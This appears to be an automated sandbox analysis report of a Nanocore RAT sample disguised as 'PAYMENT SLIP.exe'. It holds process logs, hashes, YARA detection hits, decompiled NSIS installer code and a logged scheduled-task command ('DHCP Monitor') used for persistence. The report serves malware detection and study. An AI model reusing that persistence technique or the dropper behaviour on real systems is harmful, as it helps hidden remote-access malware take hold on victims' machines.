            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            General

            Start time:15:41:28
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
            Imagebase:0xec0000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910500149.0000000001830000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910500149.0000000001830000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.909856080.0000000001450000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.909856080.0000000001450000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910512551.0000000001840000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910512551.0000000001840000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.909818098.0000000001420000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.909818098.0000000001420000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910417181.00000000017D0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910417181.00000000017D0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910472948.0000000001810000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910472948.0000000001810000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.909835016.0000000001430000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.909835016.0000000001430000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.911646592.000000000485A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910378079.00000000017A0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910378079.00000000017A0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910442224.00000000017F0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910442224.00000000017F0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910406423.00000000017C0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910406423.00000000017C0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910536260.0000000001870000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910536260.0000000001870000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.912631638.0000000005810000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.912631638.0000000005810000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.910428872.00000000017E0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.910428872.00000000017E0000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:moderate

            General

            Start time:15:41:30
            Start date:12/05/2021
            Path:C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
            Imagebase:0x400000
            File size:259286 bytes
            MD5 hash:50C9D58F61950484825D85A9A1372A7D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            General

            Start time:15:41:31
            Start date:12/05/2021
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp3E70.tmp'
            Imagebase:0x1390000
            File size:185856 bytes
            MD5 hash:15FF7D8324231381BAD48A052F85DF04
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:15:41:32
            Start date:12/05/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff724c50000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:15:41:32
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):false
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x120000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            General

            Start time:15:41:34
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
            Imagebase:0x870000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:moderate

            General

            Start time:15:41:35
            Start date:12/05/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff724c50000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:15:41:37
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
            Imagebase:0xa30000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.745514113.00000000030B1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.745514113.00000000030B1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:moderate

            General

            Start time:15:41:38
            Start date:12/05/2021
            Path:C:\Users\user\Desktop\PAYMENT SLIP.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x400000
            File size:259286 bytes
            MD5 hash:50C9D58F61950484825D85A9A1372A7D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            General

            Start time:15:41:46
            Start date:12/05/2021
            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\PAYMENT SLIP.exe'
            Imagebase:0x910000
            File size:69632 bytes
            MD5 hash:88BBB7610152B48C2B3879473B17857E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.762317389.0000000003F11000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.762317389.0000000003F11000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:moderate

            Disassembly

            Code Analysis


              Executed Functions

              C-Code - Quality: 81%
              			_entry_() {
              				signed int _t51;
              				intOrPtr* _t56;
              				WCHAR* _t60;
              				char* _t62;
              				void* _t65;
              				void* _t67;
              				int _t69;
              				int _t71;
              				int _t74;
              				intOrPtr* _t75;
              				int _t76;
              				int _t78;
              				void* _t102;
              				signed int _t119;
              				void* _t122;
              				void* _t127;
              				intOrPtr _t146;
              				intOrPtr _t147;
              				intOrPtr* _t148;
              				int _t150;
              				void* _t153;
              				int _t154;
              				signed int _t158;
              				signed int _t163;
              				signed int _t168;
              				void* _t170;
              				void* _t172;
              				int* _t174;
              				signed int _t180;
              				signed int _t183;
              				CHAR* _t184;
              				WCHAR* _t185;
              				void* _t191;
              				char* _t192;
              				void* _t195;
              				void* _t196;
              				void* _t242;
              
              				_t170 = 0x20;
              				_t150 = 0;
              				 *(_t196 + 0x14) = 0;
              				 *(_t196 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
              				 *(_t196 + 0x1c) = 0;
              				SetErrorMode(0x8001); // executed
              				_t51 = GetVersion() & 0xbfffffff;
              				 *0x42a26c = _t51;
              				if(_t51 != 6) {
              					_t148 = E00406931(0);
              					if(_t148 != 0) {
              						 *_t148(0xc00);
              					}
              				}
              				_t184 = "UXTHEME";
              				goto L4;
              				L8:
              				__imp__#17(_t191);
              				__imp__OleInitialize(_t150); // executed
              				 *0x42a338 = _t56;
              				SHGetFileInfoW(0x421708, _t150, _t196 + 0x34, 0x2b4, _t150); // executed
              				E0040653C(0x429260, L"NSIS Error");
              				_t60 = GetCommandLineW();
              				_t192 = L"\"C:\\Users\\jones\\Desktop\\PAYMENT SLIP.exe\" ";
              				E0040653C(_t192, _t60);
              				 *0x42a260 = 0x400000;
              				_t62 = _t192;
              				if(L"\"C:\\Users\\jones\\Desktop\\PAYMENT SLIP.exe\" " == 0x22) {
              					_t62 =  &M00435002;
              					_t170 = 0x22;
              				}
              				_t154 = CharNextW(E00405E3E(_t62, _t170));
              				 *(_t196 + 0x18) = _t154;
              				_t65 =  *_t154;
              				if(_t65 == _t150) {
              					L33:
              					_t185 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
              					GetTempPathW(0x400, _t185);
              					_t67 = E004035A7(_t154, 0);
              					_t224 = _t67;
              					if(_t67 != 0) {
              						L36:
              						DeleteFileW(L"1033"); // executed
              						_t69 = E00403068(_t226,  *(_t196 + 0x1c)); // executed
              						 *(_t196 + 0x10) = _t69;
              						if(_t69 != _t150) {
              							L48:
              							E00403B19();
              							__imp__OleUninitialize();
              							_t238 =  *(_t196 + 0x10) - _t150;
              							if( *(_t196 + 0x10) == _t150) {
              								__eflags =  *0x42a314 - _t150;
              								if( *0x42a314 == _t150) {
              									L72:
              									_t71 =  *0x42a32c;
              									__eflags = _t71 - 0xffffffff;
              									if(_t71 != 0xffffffff) {
              										 *(_t196 + 0x10) = _t71;
              									}
              									ExitProcess( *(_t196 + 0x10));
              								}
              								_t74 = OpenProcessToken(GetCurrentProcess(), 0x28, _t196 + 0x14);
              								__eflags = _t74;
              								if(_t74 != 0) {
              									LookupPrivilegeValueW(_t150, L"SeShutdownPrivilege", _t196 + 0x20);
              									 *(_t196 + 0x34) = 1;
              									 *(_t196 + 0x40) = 2;
              									AdjustTokenPrivileges( *(_t196 + 0x28), _t150, _t196 + 0x24, _t150, _t150, _t150);
              								}
              								_t75 = E00406931(4);
              								__eflags = _t75 - _t150;
              								if(_t75 == _t150) {
              									L70:
              									_t76 = ExitWindowsEx(2, 0x80040002);
              									__eflags = _t76;
              									if(_t76 != 0) {
              										goto L72;
              									}
              									goto L71;
              								} else {
              									_t78 =  *_t75(_t150, _t150, _t150, 0x25, 0x80040002);
              									__eflags = _t78;
              									if(_t78 == 0) {
              										L71:
              										E0040140B(9);
              										goto L72;
              									}
              									goto L70;
              								}
              							}
              							E00405BA2( *(_t196 + 0x10), 0x200010);
              							ExitProcess(2);
              						}
              						if( *0x42a280 == _t150) {
              							L47:
              							 *0x42a32c =  *0x42a32c | 0xffffffff;
              							 *(_t196 + 0x14) = E00403C0B( *0x42a32c);
              							goto L48;
              						}
              						_t174 = E00405E3E(_t192, _t150);
              						if(_t174 < _t192) {
              							L44:
              							_t235 = _t174 - _t192;
              							 *(_t196 + 0x10) = L"Error launching installer";
              							if(_t174 < _t192) {
              								_t172 = E00405B0D(_t238);
              								lstrcatW(_t185, L"~nsu");
              								if(_t172 != _t150) {
              									lstrcatW(_t185, "A");
              								}
              								lstrcatW(_t185, L".tmp");
              								if(lstrcmpiW(_t185, 0x436800) != 0) {
              									_push(_t185);
              									if(_t172 == _t150) {
              										E00405AF0();
              									} else {
              										E00405A73();
              									}
              									SetCurrentDirectoryW(_t185);
              									_t242 = L"C:\\Users\\jones\\AppData\\Local\\Temp" - _t150; // 0x43
              									if(_t242 == 0) {
              										E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", 0x436800);
              									}
              									E0040653C(0x42b000,  *(_t196 + 0x18));
              									_t155 = "A" & 0x0000ffff;
              									 *0x42b800 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
              									_t195 = 0x1a;
              									do {
              										E00406579(_t150, 0x420f08, _t185, 0x420f08,  *((intOrPtr*)( *0x42a274 + 0x120)));
              										DeleteFileW(0x420f08);
              										if( *(_t196 + 0x10) != _t150 && CopyFileW(L"C:\\Users\\jones\\Desktop\\PAYMENT SLIP.exe", 0x420f08, 1) != 0) {
              											E00406302(_t155, 0x420f08, _t150);
              											E00406579(_t150, 0x420f08, _t185, 0x420f08,  *((intOrPtr*)( *0x42a274 + 0x124)));
              											_t102 = E00405B25(0x420f08);
              											if(_t102 != _t150) {
              												CloseHandle(_t102);
              												 *(_t196 + 0x10) = _t150;
              											}
              										}
              										 *0x42b800 =  *0x42b800 + 1;
              										_t195 = _t195 - 1;
              									} while (_t195 != 0);
              									E00406302(_t155, _t185, _t150);
              								}
              								goto L48;
              							}
              							 *_t174 = _t150;
              							_t175 =  &(_t174[2]);
              							if(E00405F19(_t235,  &(_t174[2])) == 0) {
              								goto L48;
              							}
              							E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t175);
              							E0040653C(0x436000, _t175);
              							 *(_t196 + 0x10) = _t150;
              							goto L47;
              						}
              						asm("cdq");
              						asm("cdq");
              						asm("cdq");
              						_t158 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
              						_t119 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t163 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
              						while( *_t174 != _t158 || _t174[1] != _t119) {
              							_t174 = _t174;
              							if(_t174 >= _t192) {
              								continue;
              							}
              							break;
              						}
              						_t150 = 0;
              						goto L44;
              					}
              					GetWindowsDirectoryW(_t185, 0x3fb);
              					lstrcatW(_t185, L"\\Temp");
              					_t122 = E004035A7(_t154, _t224);
              					_t225 = _t122;
              					if(_t122 != 0) {
              						goto L36;
              					}
              					GetTempPathW(0x3fc, _t185);
              					lstrcatW(_t185, L"Low");
              					SetEnvironmentVariableW(L"TEMP", _t185);
              					SetEnvironmentVariableW(L"TMP", _t185);
              					_t127 = E004035A7(_t154, _t225);
              					_t226 = _t127;
              					if(_t127 == 0) {
              						goto L48;
              					}
              					goto L36;
              				} else {
              					do {
              						_t153 = 0x20;
              						if(_t65 != _t153) {
              							L13:
              							if( *_t154 == 0x22) {
              								_t154 = _t154 + 2;
              								_t153 = 0x22;
              							}
              							if( *_t154 != 0x2f) {
              								goto L27;
              							} else {
              								_t154 = _t154 + 2;
              								if( *_t154 == 0x53) {
              									_t147 =  *((intOrPtr*)(_t154 + 2));
              									if(_t147 == 0x20 || _t147 == 0) {
              										 *0x42a320 = 1;
              									}
              								}
              								asm("cdq");
              								asm("cdq");
              								_t168 = L"NCRC" & 0x0000ffff;
              								asm("cdq");
              								_t180 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t168;
              								if( *_t154 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t168) &&  *((intOrPtr*)(_t154 + 4)) == _t180) {
              									_t146 =  *((intOrPtr*)(_t154 + 8));
              									if(_t146 == 0x20 || _t146 == 0) {
              										 *(_t196 + 0x1c) =  *(_t196 + 0x1c) | 0x00000004;
              									}
              								}
              								asm("cdq");
              								asm("cdq");
              								_t163 = L" /D=" & 0x0000ffff;
              								asm("cdq");
              								_t183 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t163;
              								if( *(_t154 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t163) ||  *_t154 != _t183) {
              									goto L27;
              								} else {
              									 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
              									__eflags = _t154;
              									E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
              									L32:
              									_t150 = 0;
              									goto L33;
              								}
              							}
              						} else {
              							goto L12;
              						}
              						do {
              							L12:
              							_t154 = _t154 + 2;
              						} while ( *_t154 == _t153);
              						goto L13;
              						L27:
              						_t154 = E00405E3E(_t154, _t153);
              						if( *_t154 == 0x22) {
              							_t154 = _t154 + 2;
              						}
              						_t65 =  *_t154;
              					} while (_t65 != 0);
              					goto L32;
              				}
              				L4:
              				E004068C1(_t184); // executed
              				_t184 =  &(_t184[lstrlenA(_t184) + 1]);
              				if( *_t184 != 0) {
              					goto L4;
              				} else {
              					E00406931(0xb);
              					 *0x42a264 = E00406931(9);
              					_t56 = E00406931(7);
              					if(_t56 != _t150) {
              						_t56 =  *_t56(0x1e);
              						if(_t56 != 0) {
              							 *0x42a26f =  *0x42a26f | 0x00000040;
              						}
              					}
              					goto L8;
              				}
              			}

              APIs
              • SetErrorMode.KERNELBASE ref: 004035FB
              • GetVersion.KERNEL32 ref: 00403601
              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403634
              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403671
              • OleInitialize.OLE32(00000000), ref: 00403678
              • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403694
              • GetCommandLineW.KERNEL32(00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 004036A9
              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,00000020,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,00000000,?,00000007,00000009,0000000B), ref: 004036E1
                • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040381B
              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040382C
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403838
              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040384C
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403854
              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403865
              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040386D
              • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403881
                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
              • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 0040394C
              • ExitProcess.KERNEL32 ref: 0040396D
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403980
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040398F
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040399A
              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,00000000,00000007,?,00000007,00000009,0000000B), ref: 004039A6
              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004039C2
              • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 00403A1C
              • CopyFileW.KERNEL32(C:\Users\user\Desktop\PAYMENT SLIP.exe,00420F08,00000001,?,00000007,00000009,0000000B), ref: 00403A30
              • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000,?,00000007,00000009,0000000B), ref: 00403A5D
              • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403A8C
              • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
              • AdjustTokenPrivileges.ADVAPI32 ref: 00403ACB
              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
              • ExitProcess.KERNEL32 ref: 00403B13
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
